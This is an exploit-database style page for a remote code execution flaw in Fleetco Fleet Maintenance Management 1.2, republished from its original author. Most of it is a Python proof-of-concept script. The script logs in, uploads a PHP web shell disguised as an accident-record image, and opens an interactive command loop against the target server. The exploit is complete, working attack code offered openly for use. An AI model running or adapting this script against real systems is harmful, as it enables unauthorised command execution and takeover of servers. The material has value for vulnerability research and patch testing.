Fleetco Fleet Maintenance Management 1.2 Remote Code Execution

Details: Written by: khalil shreateh; Category: Vulnerabilities; Hits: 251

# Exploit Title: Fleetco Fleet Maintenance Management 1.2 - Remote Code Execution
# Date: 2018-11-23
# Exploit Author: Azkan Mustafa AkkuA (AkkuS)
# Contact: https://pentest.com.tr
# Date: 2018-11-23
# Exploit Author: Azkan Mustafa AkkuA (AkkuS)
# Contact: https://pentest.com.tr
# Vendor Homepage: https://www.fleetco.space
# Software Link: http://www.fleetco.space/download/215/
# Version: v1.2
# Category: Webapps
# Tested on: XAMPP for Linux 1.7.2
# Software Description : Fleetco FMM is a free, web-based vehicle fleet maintenance management
# system written in PHP with MySQL database backend.
# Description : Fleetco 1.2 and lower versions allows to upload arbitrary ".php" files which
# leads to a remote command execution on the remote server. Any authorized user is enough to exploit.
# ==================================================================
# PoC:

#!/usr/bin/python

import mechanize
import sys
import cookielib
import requests
import colorama
from colorama import Fore

print " [*] Fleetco Fleet Maintenance Management v1.2 - Remote Code Execution"
print "[*] Vulnerability discovered by AkkuS"
print "[*] My Blog - https://www.pentest.com.tr "
if (len(sys.argv) != 2):
print "[*] Usage: poc.py <RHOST>"
exit(0)

rhost = sys.argv[1]

# User Information Input
UserName = str(raw_input("User Name: "))
Password = str(raw_input("Password: "))

# Login into site
print(Fore.BLUE + "+ [*] Loging in...")
br = mechanize.Browser()
br.set_handle_robots(False)

# Cookie Jar
cj = cookielib.LWPCookieJar()
br.set_cookiejar(cj)

br.open("http://"+rhost+"/login.php")
assert br.viewing_html()
br.select_form(name="form1")
br.select_form(nr=0)
br.form['username'] = UserName
br.form['password'] = Password
br.submit()

# Where are you
title = br.title()
print (Fore.YELLOW + "+ [*] You're in "+title+" section of the app now")

# Create Accident Records with multipart/form-data to RCE
rce_headers = {"Content-Type": "multipart/form-data; boundary=---------------------------10664657171782352435254769348"}
rce_data="-----------------------------10664657171782352435254769348 Content-Disposition: form-data; name="value_Fleet_1" Cargo Carriers -----------------------------10664657171782352435254769348 Content-Disposition: form-data; name="value_Vehicle_1" BF1470 -----------------------------10664657171782352435254769348 Content-Disposition: form-data; name="value_Type_1" Lorry -----------------------------10664657171782352435254769348 Content-Disposition: form-data; name="value_Date_1" 11/07/2018 -----------------------------10664657171782352435254769348 Content-Disposition: form-data; name="type_Date_1" date2 -----------------------------10664657171782352435254769348 Content-Disposition: form-data; name="type_Time_1" time -----------------------------10664657171782352435254769348 Content-Disposition: form-data; name="value_Driver_1" Antony Croos -----------------------------10664657171782352435254769348 Content-Disposition: form-data; name="value_Details_1" test -----------------------------10664657171782352435254769348 Content-Disposition: form-data; name="type_Images_1" upload2 -----------------------------10664657171782352435254769348 Content-Disposition: form-data; name="value_Images_1"; filename="RCE.php" Content-Type: application/x-php <?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?> -----------------------------10664657171782352435254769348 Content-Disposition: form-data; name="filename_Images_1" RCE.php -----------------------------10664657171782352435254769348 Content-Disposition: form-data; name="value_EnteredBy_1" Mark Croos -----------------------------10664657171782352435254769348 Content-Disposition: form-data; name="value_SysDate_1" 2018-11-23 14:58:09 -----------------------------10664657171782352435254769348 Content-Disposition: form-data; name="id" 1 -----------------------------10664657171782352435254769348 Content-Disposition: form-data; name="a" added -----------------------------10664657171782352435254769348 Content-Disposition: form-data; name="rndVal" 0.8040138072331872 -----------------------------10664657171782352435254769348-- "

upload = requests.post("http://"+rhost+"/accidents_add.php?submit=1&", headers=rce_headers, cookies=cj, data=rce_data)
if upload.status_code == 200:
print (Fore.GREEN + "+ [*] Shell successfully uploaded!")

# Shell validation and exploit
while True:
shellctrl = requests.get("http://"+rhost+"/files/RCE.php")
if shellctrl.status_code == 200:
Command = str(raw_input(Fore.WHITE + "shell> "))
URL = requests.get("http://"+rhost+"/files/RCE.php?cmd="+Command+"")
print URL.text
else:
print (Fore.RED + "+ [X] Unable to upload or access the shell")
sys.exit()